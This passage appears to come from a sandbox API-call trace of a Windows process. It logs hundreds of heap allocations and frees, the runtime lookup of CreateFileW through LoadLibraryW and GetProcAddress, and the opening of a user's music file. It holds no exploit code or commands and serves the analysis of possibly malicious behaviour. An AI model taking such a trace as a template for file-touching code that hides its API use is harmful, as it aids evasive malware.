Size=0x1) returned 0x43e2320 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0110.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0110.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0110.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0110.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0110.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0110.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0110.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0110.566] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0110.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0110.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.569] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.571] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0110.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0110.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca400, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0110.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.572] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0110.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0110.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0110.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0110.574] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a" (normalized: "c:\\users\\fd1hvy\\music\\juj1pss7vx.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9bf0 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0110.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0110.574] RtlAllocateHeap (HeapHandle=0x1780000, 